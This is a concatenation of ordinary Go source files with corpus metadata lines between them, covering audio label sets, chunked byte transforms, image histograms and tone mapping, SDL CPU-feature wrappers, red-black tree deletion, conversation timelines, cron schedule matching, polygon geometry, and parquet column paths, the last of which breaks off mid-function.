	End   float64 // end offset in seconds; expected to satisfy Start <= End
}
// LabelSet is the set of labels for one Clip
type LabelSet struct {
	VocabName VocabName
	ID        ClipID // hash of the clip these labels annotate
	Labels    []Label
}
// ToStateIDArray converts the labelSet to a per-stride array of state IDs.
// Each stride takes the state of the label whose (Start, End) span strictly
// contains the stride's start time; uncovered strides stay 0 (Nil).
func (labels *LabelSet) ToStateIDArray() (stateArray [StridesPerClip]int32) {
	for i := range stateArray {
		// Time in seconds at which stride i begins.
		loc := float64(i) / float64(StridesPerClip) * float64(Duration)
		for _, label := range labels.Labels {
			if loc > label.Start && loc < label.End {
				stateArray[i] = int32(label.State)
				// Labels are expected to be non-overlapping (see IsGood), so
				// the first match suffices. The original used `continue`,
				// which only advanced the inner loop and did nothing useful.
				break
			}
		}
	}
	return
}
// ToStateArray converts the labelSet to a per-stride array of States.
// Each stride takes the state of the label whose (Start, End) span strictly
// contains the stride's start time; uncovered strides stay Nil.
func (labels *LabelSet) ToStateArray() (stateArray [StridesPerClip]State) {
	for i := range stateArray {
		// Time in seconds at which stride i begins.
		loc := float64(i) / float64(StridesPerClip) * float64(Duration)
		for _, label := range labels.Labels {
			if loc > label.Start && loc < label.End {
				stateArray[i] = label.State
				// First match wins (labels are non-overlapping per IsGood);
				// the original `continue` was an ineffective stand-in for break.
				break
			}
		}
	}
	return
}
// IsGood returns true iff the labelsSet contains no overlaps or other bad things. Executes in O(n2) time.
func (labels *LabelSet) IsGood() bool {
	for _, label := range labels.Labels {
		// A label must lie within the clip's [0, Duration] window.
		if label.Start < 0 {
			return false
		}
		if label.End > float64(Duration) {
			return false
		}
		// Check every label's endpoints against every other label's span.
		// Comparing a label against itself is harmless: the strict
		// inequalities below are false when both sides are the same label.
		for _, otherLabel := range labels.Labels {
			if label.Start > otherLabel.Start && label.Start < otherLabel.End {
				return false
			}
			if label.End > otherLabel.Start && label.End < otherLabel.End {
				return false
			}
		}
	}
	return true
}
// Serialize encodes the LabelSet with encoding/gob and returns the bytes.
func (labels *LabelSet) Serialize() (serialized []byte, err error) {
	var buf bytes.Buffer
	if err = gob.NewEncoder(&buf).Encode(labels); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}
// DeserializeLabelSet decodes a gob-encoded LabelSet produced by Serialize.
func DeserializeLabelSet(serialized []byte) (labelSet LabelSet, err error) {
	err = gob.NewDecoder(bytes.NewReader(serialized)).Decode(&labelSet)
	return
}
// GenFakeLabelSet creates a fake LabelSet for testing: ten one-second
// labels covering seconds 0-10, cycling through Nil, Yes, No.
func GenFakeLabelSet() (output LabelSet) {
	cycle := []State{Nil, Yes, No}
	output.Labels = make([]Label, 0, 10)
	for i := 0; i < 10; i++ {
		output.Labels = append(output.Labels, Label{
			State: cycle[i%3],
			Start: float64(i),
			End:   float64(i + 1),
		})
	}
	return
}
//GenFakeInput produces fake a mfcc list exactly matching the given cmdIdArray
func GenFakeInput(cmds [StridesPerClip]int32) (fakeMFCCs [][]float32) {
fakeMFCCs = make([][]float32, StridesPerClip)
for i, cmd := range cmds {
fakeMFCCs[i] = make([]float32, InputSize)
if cmd == 0 {
fakeMFCCs[i][0] = 1
}
if cmd == 1 {
fakeMFCCs[i][1] = 1
}
if cmd == 2 {
fakeMFCCs[i][2] = 1
}
if cmd == 3 {
fakeMFCCs[i][3] = 1
}
}
return
} | libaural2/libaural2.go | 0.702326 | 0.407628 | libaural2.go | starcoder |
package forwardt
import "github.com/melvinodsa/goOdsa/utils"
//FTransform does the forward transform of a given string
// Every byte is fed into the accumulator while the largest byte seen and
// the index of the most recently processed position are tracked.
func FTransform(iString []byte) utils.Data {
	result := utils.NewODSAData()
	if len(iString) == 0 {
		return result
	}
	result.SetLastLetter(0)
	result.SetLastPos(-1)
	//Algorithm starts
	for pos, letter := range iString {
		result.AddData(letter)
		if letter > result.GetLastLetter() {
			result.SetLastLetter(letter)
		}
		result.SetLastPos(pos)
	}
	return result
}
/*fTransformWrapper is a wrapper function for concurrent
transformation of the input data to be processed in chunks.
It runs FTransform on one chunk and delivers the result, tagged with its
original index, on the channel.
*/
func fTransformWrapper(channel chan utils.ChanData, iString []byte, index int) {
	result := FTransform(iString)
	channel <- utils.ChanData{Data: result, Index: index}
}
/*fTransformFactory creates the wrappers function necessary for the chunk processing
of data once the maxChunk limit is crossed. endChannel is used to communicate the finished
data array.
*/
func fTransformFactory(channel chan utils.ChanData, endChannel chan []utils.ChanData, strings [][]byte, size, startIndex int) {
	dataArray := []utils.ChanData{}
	currentSize := 0
	for {
		//Getting each data from the channel
		data := <-channel
		dataArray = append(dataArray, data)
		currentSize++
		if startIndex < size {
			//Creating a wrapper function to process next chunk
			// (one new worker is launched for each completed one, keeping
			// at most maxChunks in flight)
			go fTransformWrapper(channel, strings[startIndex], startIndex)
			startIndex++
		} else if currentSize == size {
			// All chunks collected: publish the (unordered) results.
			endChannel <- dataArray
			// NOTE(review): this final receive blocks until one more value
			// arrives on channel — it appears to expect a sentinel send from
			// the consumer; verify against the callers, otherwise this
			// goroutine leaks.
			<-channel
			return
		}
	}
}
/*FTransformChunk transforms the chunk data with goroutines running
FTransform. strings is the array of byte arrays containing the data to be
compressed in chunks. maxChunks is the maximum number of chunks to process
concurrently. endChannel is passed to the factory function to communicate
the end result so that others can use the data.
*/
func FTransformChunk(strings [][]byte, maxChunks int, channel chan utils.ChanData, endChannel chan []utils.ChanData) {
	size := len(strings)
	useFactory := false
	if maxChunks < size {
		size = maxChunks
		useFactory = true
	}
	//Concurrently processing the data to be transformed
	// (launches min(len(strings), maxChunks) workers up front)
	for i := 0; i < size; i++ {
		go fTransformWrapper(channel, strings[i], i)
	}
	//Once the max limit is reached, use the factory function
	// to process the rest of the chunks.
	// NOTE(review): when useFactory is false nothing forwards results to
	// endChannel — presumably the caller reads channel directly; verify.
	if useFactory {
		size = len(strings)
		go fTransformFactory(channel, endChannel, strings, size, maxChunks)
	}
}
package main
import (
"image"
"image/color"
"math"
)
// Channel stores a histogram of all values present in
// and image for a specific colour channel
type Channel struct {
	// Shades[v] is the number of pixels observed with value v (16-bit range).
	Shades          [65536]uint32
	// Min/Max track the smallest and largest value added; Total counts adds.
	Min, Max, Total uint32
}
// Add records a single colour value in the channel's histogram and updates
// the running minimum, maximum and total counters.
func (c *Channel) Add(val uint32) {
	c.Shades[val] += 1
	c.Total += 1
	// A zero-valued Channel starts with Min == 0, so the original
	// `val < c.Min` test could never raise Min and the tracked minimum was
	// always 0. Seed Min from the first sample instead.
	if c.Total == 1 || val < c.Min {
		c.Min = val
	}
	if val > c.Max {
		c.Max = val
	}
}
// Percentile finds the value at percentile pct (0..1) among all the values
// stored for the channel, by accumulating histogram buckets from Min up.
// Returns 65535 if the percentile is never exceeded.
func (c Channel) Percentile(pct float64) uint16 {
	total := float64(c.Total)
	var sum uint32
	// Include the c.Max bucket itself: the original `i < c.Max` bound
	// skipped the histogram bucket of the largest recorded value.
	for i := c.Min; i <= c.Max; i++ {
		sum += c.Shades[i]
		if float64(sum)/total > pct {
			return uint16(i)
		}
	}
	return 65535
}
// Merge adds up the values in two channels, widening Min/Max to cover both
// and summing the histograms and totals.
func (c *Channel) Merge(other *Channel) {
	if other.Min < c.Min {
		c.Min = other.Min
	}
	if other.Max > c.Max {
		c.Max = other.Max
	}
	// Include the c.Max bucket: the original `i < c.Max` bound dropped the
	// counts stored for the largest value.
	for i := c.Min; i <= c.Max; i++ {
		c.Shades[i] += other.Shades[i]
	}
	c.Total += other.Total
}
// Palette groups a Red, a Green and a Blue channel
type Palette struct {
	Red, Green, Blue Channel
	Total            int // number of colours added via Add
}
// Merge merges another Palette with this one, channel by channel.
func (p *Palette) Merge(other Palette) {
	p.Red.Merge(&other.Red)
	p.Green.Merge(&other.Green)
	p.Blue.Merge(&other.Blue)
	p.Total += other.Total
}
// Add adds a new colour value to a Palette, splitting it into its
// alpha-premultiplied 16-bit R, G and B components (alpha is ignored).
func (p *Palette) Add(c color.RGBA64) {
	r, g, b, _ := c.RGBA()
	p.Red.Add(r)
	p.Green.Add(g)
	p.Blue.Add(b)
	p.Total += 1
}
// Range is an inclusive low/high interval of 16-bit channel values.
type Range struct {
	Low, High uint16
}
// Transformation holds per-channel input ranges and a contrast factor used
// to build pixel mappings (see Sigmoid and Linear).
type Transformation struct {
	Red, Green, Blue Range
	Contrast         float64
}
// Mapping transforms one RGBA64 pixel into another.
type Mapping func(color.RGBA64) (out color.RGBA64)
// Apply runs the mapping over every pixel of input and returns the result
// as a new RGBA64 image; the input image is not modified.
func (m Mapping) Apply(input image.Image) image.Image {
	bounds := input.Bounds()
	// Renamed from `copy`, which shadowed the builtin copy function.
	out := image.NewRGBA64(bounds)
	for x := bounds.Min.X; x < bounds.Max.X; x++ {
		for y := bounds.Min.Y; y < bounds.Max.Y; y++ {
			in := color.RGBA64Model.Convert(input.At(x, y))
			out.Set(x, y, m(in.(color.RGBA64)))
		}
	}
	return out
}
// Sigmoid builds a Mapping that applies an erf-shaped (sigmoid-like) tone
// curve to each channel: values are centred on the middle of the channel's
// configured range, scaled by Contrast, passed through math.Erf and mapped
// back to 16-bit output.
func (t Transformation) Sigmoid() Mapping {
	rmin, rmax := float64(t.Red.Low), float64(t.Red.High)
	gmin, gmax := float64(t.Green.Low), float64(t.Green.High)
	bmin, bmax := float64(t.Blue.Low), float64(t.Blue.High)
	rdiff := float64(rmax - rmin)
	gdiff := float64(gmax - gmin)
	bdiff := float64(bmax - bmin)
	return func(in color.RGBA64) (out color.RGBA64) {
		// Shift each channel so 0 falls at the midpoint of its range.
		valr := (float64(in.R) - rmin) - (rdiff / 2)
		valg := (float64(in.G) - gmin) - (gdiff / 2)
		valb := (float64(in.B) - bmin) - (bdiff / 2)
		// Scale: larger Contrast steepens the curve.
		valr *= (math.Pi / (rdiff / t.Contrast))
		valg *= (math.Pi / (gdiff / t.Contrast))
		valb *= (math.Pi / (bdiff / t.Contrast))
		// Erf returns [-1, 1]; +1 then *32767 maps to [0, 65534].
		// NOTE(review): this peaks at 65534, not 65535 — confirm intended.
		out.R = uint16((math.Erf(valr) + 1) * 32767)
		out.G = uint16((math.Erf(valg) + 1) * 32767)
		out.B = uint16((math.Erf(valb) + 1) * 32767)
		out.A = in.A
		return out
	}
}
// Linear builds a Mapping that linearly rescales each channel from its
// configured [Low, High] range to the full 16-bit range. Note that `unit`
// returns 1-v, so the output is inverted relative to the input (values at
// Low map to 65535 and values at High map to 0); out-of-range inputs clamp.
func (t Transformation) Linear() Mapping {
	rmin, rmax := float64(t.Red.Low), float64(t.Red.High)
	gmin, gmax := float64(t.Green.Low), float64(t.Green.High)
	bmin, bmax := float64(t.Blue.Low), float64(t.Blue.High)
	rdiff := float64(rmax - rmin)
	gdiff := float64(gmax - gmin)
	bdiff := float64(bmax - bmin)
	// unit clamps v to [0, 1] and inverts it.
	unit := func(v float64) float64 {
		if v < 0 {
			return 1
		}
		if v > 1 {
			return 0
		}
		return 1 - v
	}
	return func(in color.RGBA64) (out color.RGBA64) {
		// normalize to 0..1
		valr := unit((float64(in.R) - rmin) / rdiff)
		valg := unit((float64(in.G) - gmin) / gdiff)
		valb := unit((float64(in.B) - bmin) / bdiff)
		out.R = uint16(valr * 65535.0)
		out.G = uint16(valg * 65535.0)
		out.B = uint16(valb * 65535.0)
		out.A = in.A
		return out
	}
}
package sdl
// #include "includes.h"
import "C"
// CPU feature detection for SDL.
// These are thin cgo wrappers over the SDL_cpuinfo.h API.
const (
	CACHELINE_SIZE = C.SDL_CACHELINE_SIZE
)
// This function returns the number of CPU cores available.
// ↪ https://wiki.libsdl.org/SDL_GetCPUCount
func GetCPUCount() (retval int) {
	retval = int(C.SDL_GetCPUCount())
	return
}
// This function returns the L1 cache line size of the CPU
//
// This is useful for determining multi-threaded structure padding or
// SIMD prefetch sizes.
// ↪ https://wiki.libsdl.org/SDL_GetCPUCacheLineSize
func GetCPUCacheLineSize() (retval int) {
	retval = int(C.SDL_GetCPUCacheLineSize())
	return
}
// This function returns true if the CPU has the RDTSC instruction.
// ↪ https://wiki.libsdl.org/SDL_HasRDTSC
func HasRDTSC() (retval bool) {
	// SDL returns an SDL_bool; comparing against SDL_TRUE yields a Go bool.
	// The same pattern is used by all Has* wrappers below.
	retval = C.SDL_TRUE==(C.SDL_HasRDTSC())
	return
}
// This function returns true if the CPU has AltiVec features.
// ↪ https://wiki.libsdl.org/SDL_HasAltiVec
func HasAltiVec() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasAltiVec())
	return
}
// This function returns true if the CPU has MMX features.
// ↪ https://wiki.libsdl.org/SDL_HasMMX
func HasMMX() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasMMX())
	return
}
// This function returns true if the CPU has 3DNow! features.
// ↪ https://wiki.libsdl.org/SDL_Has3DNow
func Has3DNow() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_Has3DNow())
	return
}
// This function returns true if the CPU has SSE features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE
func HasSSE() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasSSE())
	return
}
// This function returns true if the CPU has SSE2 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE2
func HasSSE2() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasSSE2())
	return
}
// This function returns true if the CPU has SSE3 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE3
func HasSSE3() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasSSE3())
	return
}
// This function returns true if the CPU has SSE4.1 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE41
func HasSSE41() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasSSE41())
	return
}
// This function returns true if the CPU has SSE4.2 features.
// ↪ https://wiki.libsdl.org/SDL_HasSSE42
func HasSSE42() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasSSE42())
	return
}
// This function returns true if the CPU has AVX features.
// ↪ https://wiki.libsdl.org/SDL_HasAVX
func HasAVX() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasAVX())
	return
}
// This function returns true if the CPU has AVX2 features.
// ↪ https://wiki.libsdl.org/SDL_HasAVX2
func HasAVX2() (retval bool) {
	retval = C.SDL_TRUE==(C.SDL_HasAVX2())
	return
}
// This function returns the amount of RAM configured in the system, in
// MB.
// ↪ https://wiki.libsdl.org/SDL_GetSystemRAM
func GetSystemRAM() (retval int) {
	retval = int(C.SDL_GetSystemRAM())
	return
}
package rbt
import (
"github.com/smartystreets/assertions"
)
// https://www.bilibili.com/video/BV1oq4y1d7jv?spm_id_from=333.999.0.0 0:35:0 (double-black node)
// Remove deletes the node with key v from the tree, returning false when no
// such key exists. Deletion is reduced step by step: a node with two
// children is swapped with its in-order successor (case 3) until a node
// with at most one child remains (cases 1 and 2).
func (t *RedBlackTree) Remove(v Key) (ret bool) {
	ret = true
	cur := t.Find(v)
	if cur == nil {
		return false
	}
	for {
		// case 1: leaf node — remove directly (fixing double-black first
		// if the leaf is black).
		if cur.Left == nil && cur.Right == nil {
			t.removeCaseOne(cur)
			return
		}
		// case 2: exactly one child — the child must be red; splice it in.
		if (cur.Left == nil && cur.Right != nil) || (cur.Left != nil && cur.Right == nil) {
			t.removeCaseTwo(cur)
			return
		}
		// case 3: two children — swap with successor and loop on it.
		cur = t.removeCaseThree(cur)
	}
}
// removeCaseOne removes a leaf node. A red leaf can be detached directly;
// a black leaf leaves a "double black" deficit that must be repaired with
// doubleBlackFix before the node is unlinked.
func (t *RedBlackTree) removeCaseOne(cur *RedBlackNode) {
	parent := cur.Parent
	// case 1.1: red leaf — just remove.
	if cur.GetColor() == RED {
		if cur == parent.Left {
			parent.Left = nil
		} else {
			parent.Right = nil
		}
		cur.Clear()
		return
	}
	// case 1.2: black leaf — repair the double-black deficit first, then
	// unlink (the root case empties the tree).
	t.doubleBlackFix(cur)
	if cur.Parent == nil {
		t.Root = nil
	} else if cur == parent.Left {
		parent.Left = nil
	} else {
		parent.Right = nil
	}
	cur.Clear()
}
// case 2 : one of the children is null, the other must be red, and the cur must be black
func (t *RedBlackTree) removeCaseTwo(cur *RedBlackNode) {
	assertions.ShouldEqual(cur.GetColor(), BLACK)
	// Pick whichever child exists; it is the red node replacing cur's data.
	candidate := cur.Left
	if cur.Right != nil {
		candidate = cur.Right
	}
	assertions.ShouldEqual(candidate.GetColor(), RED)
	// Copy the candidate's key/value into cur (cur keeps its colour),
	// detach both children and release the candidate node.
	cur.AcceptKeyValue(candidate)
	cur.Left = nil
	cur.Right = nil
	candidate.Clear()
}
// case 3: all of the children are not null
func (t *RedBlackTree) removeCaseThree(cur *RedBlackNode) *RedBlackNode {
	// Replace cur's key/value with its in-order successor (the leftmost
	// node of the right subtree) and hand the successor back so the caller
	// can delete it via case 1 or case 2.
	successor := t.FindMostLeft(cur.Right)
	cur.AcceptKeyValue(successor)
	return successor
}
// double black, we delete node in the end, so we need not to consider the case that the double black is null
// https://www.bilibili.com/video/BV1oq4y1d7jv 0:09:42
// attention: the nil node is considered to be BLACK too https://www.bilibili.com/video/BV19L411G72Y 1:20:30
// We first do the double-black fix, then delete the node; this way we avoid
// the situation where the double black itself is null.
// Case labels encode the colours of (P, S, N, F): 1 = black, 0 = red,
// y = either. NOTE(review): n and f may be nil (see getPSNF); IsBlack/IsRED
// are presumably nil-safe — verify their receivers.
func (t *RedBlackTree) doubleBlackFix(db *RedBlackNode) {
	for db.Parent != nil {
		p, s, n, f := t.getPSNF(db)
		assertions.ShouldNotBeNil(p)
		assertions.ShouldNotBeNil(s)
		// first consider the case that n and f all black
		if n.IsBlack() && f.IsBlack() {
			// case : 0111 — red parent absorbs one black, sibling turns red.
			if p.GetColor() == RED {
				assertions.ShouldEqual(s.GetColor(), BLACK)
				// db give one BLACK to p , and set color of s to RED
				p.SetColor(BLACK)
				s.SetColor(RED)
				return
			}
			// case : 1111 — everything black: push the deficit up to p.
			if p.IsBlack() && s.IsBlack() {
				// db give on BLACK to p , and set color of s to RED, p become double BLACK
				s.SetColor(RED)
				db = p
				continue
			}
			/* case : 1011
			     P                 S
			    / \               / \
			  DB   S      ->     P   F
			      / \           / \
			     N   F        DB   N
			*/
			if p.IsBlack() && s.IsRED() {
				// this is a programming trick, we exchange the color of p with s firstly
				// because after Rotate(), the pointer of p,s may be changed to different pointer
				p.SetColor(RED)
				s.SetColor(BLACK)
				t.Rotate(f, s, p)
				// db is unchanged; the next iteration lands in a red-parent case.
				continue
			}
		}
		/* case : y101 — near nephew red: double rotation via n.
		     P                 N
		    / \               / \
		  DB   S      ->     P   S
		      / \           / \
		     N   F        DB   F
		*/
		if n.IsRED() {
			pColor := p.GetColor()
			root, left, right := t.Rotate(n, s, p)
			// New subtree root takes P's old colour; its children go black.
			root.SetColor(pColor)
			left.SetColor(BLACK)
			right.SetColor(BLACK)
			return
		}
		/* case : y110 — far nephew red: single rotation via s.
		     P                 S
		    / \               / \
		  DB   S      ->     P   F
		      / \           / \
		     N   F        DB   N
		*/
		pColor := p.GetColor()
		root, left, right := t.Rotate(f, s, p)
		root.SetColor(pColor)
		left.SetColor(BLACK)
		right.SetColor(BLACK)
		return
	}
}
// https://www.bilibili.com/video/BV19L411G72Y 1:25:16 n or f may be null
func (t *RedBlackTree) getPSNF(db *RedBlackNode) (p, s, n, f *RedBlackNode) {
p = db.Parent
if db == p.Left {
s = p.Right
n = s.Left // the node near to db
f = s.Right // the node far from db
} else {
s = p.Left
n = s.Right // the node near to db
f = s.Left // the node far from db
}
return
} | rb_tree_delete.go | 0.546496 | 0.496948 | rb_tree_delete.go | starcoder |
package insights
import (
"math"
"sort"
"time"
)
// Timeline buckets a Conversation into fixed-duration windows keyed by the
// window's start time.
type Timeline map[time.Time]Conversation
// NewTimeline splits conversation c into windows of duration d (default:
// 24h). Windows span from midnight UTC of the first message's day to the
// end of the last message's day. A message lands in the window whose
// (start, start+d) interval strictly contains its timestamp.
// NOTE(review): messages exactly on a window boundary are excluded by the
// strict After/Before comparisons — confirm this is intended.
func NewTimeline(c Conversation, d time.Duration) (t Timeline) {
	if d == 0 {
		d = time.Hour * 24
	}
	first, last := c.First(), c.Last()
	// Normalize to whole days in UTC.
	start := time.Date(first.Time.Year(), first.Time.Month(), first.Time.Day(), 0, 0, 0, 0, time.UTC)
	end := time.Date(last.Time.Year(), last.Time.Month(), last.Time.Day(), 23, 59, 59, 999999999, time.UTC)
	days := int(math.Ceil(float64(end.Sub(start)) / float64(d)))
	cursor := start
	// limit is one nanosecond before the end of the current window.
	limit := start.Add(d).Add(time.Nanosecond * -1)
	t = make(Timeline, days)
	for i := 0; i < days; i++ {
		t[cursor] = Conversation{}
		for _, msg := range c {
			if msg.Time.After(cursor) && msg.Time.Before(limit) {
				t[cursor] = append(t[cursor], msg)
			}
		}
		cursor = cursor.Add(d)
		limit = cursor.Add(d).Add(time.Nanosecond * -1)
	}
	return
}
// Extract flattens the timeline into three parallel maps keyed by window
// start: message count, word count and letter count.
func (t Timeline) Extract() (count, words, letters map[time.Time]int) {
	n := len(t)
	count = make(map[time.Time]int, n)
	words = make(map[time.Time]int, n)
	letters = make(map[time.Time]int, n)
	for day, conv := range t {
		count[day] = conv.Count()
		words[day] = conv.Words()
		letters[day] = conv.Letters()
	}
	return
}
// Days returns the timeline's window-start times sorted in ascending order.
func (t Timeline) Days() (keys []time.Time) {
	// Pre-size the slice: the number of keys is known up front, avoiding
	// repeated growth copies during append.
	keys = make([]time.Time, 0, len(t))
	for k := range t {
		keys = append(keys, k)
	}
	sort.Slice(keys, func(i, j int) bool {
		return keys[i].Before(keys[j])
	})
	return keys
}
// Most returns the day with the highest message count along with that
// count. The zero time and 0 are returned for an empty timeline.
func (t Timeline) Most() (date time.Time, count int) {
	keys := t.Days()
	if len(keys) > 0 {
		date, count = keys[0], t[keys[0]].Count()
	}
	for _, k := range keys {
		// Compare using Count() consistently; the original mixed len(t[k])
		// with Count(), which silently diverges if Count() is ever not the
		// plain element count.
		if t[k].Count() > count {
			date, count = k, t[k].Count()
		}
	}
	return
}
// Least returns the day with the lowest message count along with that
// count. The zero time and 0 are returned for an empty timeline.
func (t Timeline) Least() (date time.Time, count int) {
	keys := t.Days()
	if len(keys) > 0 {
		date, count = keys[0], t[keys[0]].Count()
	}
	for _, k := range keys {
		// Use Count() consistently rather than mixing len(t[k]) and
		// Count() as the original did (see Most).
		if t[k].Count() < count {
			date, count = k, t[k].Count()
		}
	}
	return
}
func (t Timeline) Average() (messages, words, letters float64) {
m, w, l := 0, 0, 0
for _, v := range t {
m += v.Count()
w += v.Words()
l += v.Letters()
}
messages = float64(m) / float64(len(t))
words = float64(w) / float64(len(t))
letters = float64(l) / float64(len(t))
return
} | timeline.go | 0.593609 | 0.428712 | timeline.go | starcoder |
package nudge
import (
"fmt"
"strings"
"time"
"github.com/robfig/cron/v3"
)
var (
	// weekDays maps each time.Weekday to its lowercase English name,
	// e.g. time.Monday -> "monday".
	weekDays = map[time.Weekday]string{
		time.Sunday:    strings.ToLower(time.Sunday.String()),
		time.Monday:    strings.ToLower(time.Monday.String()),
		time.Tuesday:   strings.ToLower(time.Tuesday.String()),
		time.Wednesday: strings.ToLower(time.Wednesday.String()),
		time.Thursday:  strings.ToLower(time.Thursday.String()),
		time.Friday:    strings.ToLower(time.Friday.String()),
		time.Saturday:  strings.ToLower(time.Saturday.String()),
	}
	// scheduleParser accepts standard 5-field cron expressions
	// (minute hour dom month dow).
	scheduleParser = cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow)
)
// Greedy fuzzy search
func expandWeekDay(dayNames map[time.Weekday]string, shorthand string) (time.Weekday, error) {
shorthand = strings.ToLower(shorthand)
for i, day := range weekDays {
if strings.HasPrefix(day, shorthand) {
return time.Weekday(i), nil
}
}
return 0, fmt.Errorf("week day not matched")
}
// ValidateSchedule parses every semicolon-separated cron expression in
// schedule and returns the first parse error, or nil if all are valid.
func ValidateSchedule(schedule string) error {
	for _, part := range strings.Split(schedule, ";") {
		if _, err := scheduleParser.Parse(part); err != nil {
			return err
		}
	}
	return nil
}
// Parse and match cron schedule definition
// ┌───────────── minute (0 - 59)
// │ ┌───────────── hour (0 - 23)
// │ │ ┌───────────── day of the month (1 - 31)
// │ │ │ ┌───────────── month (1 - 12)
// │ │ │ │ ┌───────────── day of the week (0 - 6) (Sunday to Saturday;
// │ │ │ │ │                                   7 is also Sunday on some systems)
// │ │ │ │ │
// │ │ │ │ │
// * * * * *
// Each value may specify an interval, e.g.:
// * 18-08 * * 1-5
// Translates to this: from 18 till 8 from Monday till Friday
//
// MatchSchedule reports whether any semicolon-separated cron expression in
// schedule matches the current minute, shifted forward by advance.
// NOTE(review): a parse error in ANY part returns false immediately, even
// if a later part would match — confirm this short-circuit is intended.
func MatchSchedule(schedule string, advance time.Duration) bool {
	for _, part := range strings.Split(schedule, ";") {
		sc, err := scheduleParser.Parse(part)
		if err != nil {
			return false
		}
		now := time.Now().Add(advance)
		// Next() from one minute ago yields "now" itself when the current
		// minute matches the expression, making the difference <= 0.
		next := sc.Next(now.Add(-time.Minute))
		if next.Sub(now).Minutes() <= 0 {
			return true
		}
	}
	return false
}
package poly
import (
	"fmt"
	"strings"
)
// Point is simple 2D point (Z is carried along but ignored by the 2D
// containment/intersection tests below).
type Point struct {
	X, Y, Z float64
}
// InsideRect reports whether the point lies within rect, borders inclusive.
func (p Point) InsideRect(rect Rect) bool {
	return p.X >= rect.Min.X && p.X <= rect.Max.X &&
		p.Y >= rect.Min.Y && p.Y <= rect.Max.Y
}
// Polygon is series of points that make up a polygon
type Polygon []Point
// InsideRect detects polygon is inside of another rect: every vertex must
// lie within rect. An empty polygon is reported as outside.
func (p Polygon) InsideRect(rect Rect) bool {
	if len(p) == 0 {
		return false
	}
	for _, p := range p {
		if !p.InsideRect(rect) {
			return false
		}
	}
	return true
}
// IntersectsRect detects whether the polygon intersects rect by converting
// the rect to a closed polygon and delegating to Intersects (defined
// elsewhere in the package). An empty polygon never intersects.
func (p Polygon) IntersectsRect(rect Rect) bool {
	if len(p) == 0 {
		return false
	}
	// Closed ring: Min -> top-left -> Max -> bottom-right -> Min.
	rectPoly := Polygon{rect.Min, {rect.Min.X, rect.Max.Y, 0}, rect.Max, {rect.Max.X, rect.Min.Y, 0}, rect.Min}
	return p.Intersects(rectPoly, nil)
}
// String returns a string representation of the polygon, e.g.
// "{{0, 0}, {1, 2}}".
func (p Polygon) String() string {
	// Build with strings.Builder rather than += concatenation, which is
	// quadratic in the number of points.
	var b strings.Builder
	b.WriteByte('{')
	for i, pt := range p {
		if i > 0 {
			b.WriteString(", ")
		}
		fmt.Fprintf(&b, "{%v, %v}", pt.X, pt.Y)
	}
	b.WriteByte('}')
	return b.String()
}
// Rect is rectangle defined by its minimum and maximum corner points.
type Rect struct {
	Min, Max Point
}
// Polygon returns the rect's outline as a closed five-point polygon,
// starting and ending at the top-left corner.
func (r Rect) Polygon() Polygon {
	return Polygon{
		{X: r.Min.X, Y: r.Max.Y},
		{X: r.Max.X, Y: r.Max.Y},
		{X: r.Max.X, Y: r.Min.Y},
		{X: r.Min.X, Y: r.Min.Y},
		{X: r.Min.X, Y: r.Max.Y},
	}
}
// Rect returns the bounding box rectangle for the polygon.
// The zero Rect is returned for an empty polygon; Z of the first vertex is
// carried into both corners.
func (p Polygon) Rect() Rect {
	var bbox Rect
	if len(p) == 0 {
		return bbox
	}
	bbox.Min, bbox.Max = p[0], p[0]
	for _, pt := range p[1:] {
		if pt.X < bbox.Min.X {
			bbox.Min.X = pt.X
		} else if pt.X > bbox.Max.X {
			bbox.Max.X = pt.X
		}
		if pt.Y < bbox.Min.Y {
			bbox.Min.Y = pt.Y
		} else if pt.Y > bbox.Max.Y {
			bbox.Max.Y = pt.Y
		}
	}
	return bbox
}
// IntersectsRect detects if two bboxes intersect (touching edges count).
func (r Rect) IntersectsRect(rect Rect) bool {
	return r.Min.Y <= rect.Max.Y && r.Max.Y >= rect.Min.Y &&
		r.Min.X <= rect.Max.X && r.Max.X >= rect.Min.X
}
// InsideRect detects rect is inside of another rect
func (r Rect) InsideRect(rect Rect) bool {
if r.Min.X < rect.Min.X || r.Max.X > rect.Max.X {
return false
}
if r.Min.Y < rect.Min.Y || r.Max.Y > rect.Max.Y {
return false
}
return true
} | pkg/geojson/poly/poly.go | 0.869105 | 0.607052 | poly.go | starcoder |
package parquet
import "strings"
// columnPath is a dotted path of field names addressing a column in a
// nested schema.
type columnPath []string
// append returns a new path with name added. The full slice expression
// path[:len(path):len(path)] caps the slice so the builtin append always
// copies, preventing sibling paths from sharing (and stomping) a backing
// array.
func (path columnPath) append(name string) columnPath {
	return append(path[:len(path):len(path)], name)
}
// equal reports element-wise equality with other.
func (path columnPath) equal(other columnPath) bool {
	return stringsAreEqual(path, other)
}
// less reports whether path orders strictly before other (see
// stringsAreOrdered for the exact — non-lexicographic — ordering).
func (path columnPath) less(other columnPath) bool {
	return stringsAreOrdered(path, other)
}
// String joins the path elements with dots, e.g. "a.b.c".
func (path columnPath) String() string {
	return strings.Join(path, ".")
}
// stringsAreEqual reports whether the two slices have the same length and
// identical elements in order.
func stringsAreEqual(strings1, strings2 []string) bool {
	if len(strings1) != len(strings2) {
		return false
	}
	for i, s := range strings1 {
		if s != strings2[i] {
			return false
		}
	}
	return true
}
// stringsAreOrdered reports whether strings1 orders before strings2.
// Note this is NOT lexicographic order: EVERY element of the common prefix
// must be strictly less than its counterpart, and strings1 must be no
// longer than strings2. NOTE(review): confirm callers rely on this exact
// (element-wise strict) ordering rather than standard lexicographic order.
func stringsAreOrdered(strings1, strings2 []string) bool {
	n := len(strings1)
	if n > len(strings2) {
		n = len(strings2)
	}
	for i := 0; i < n; i++ {
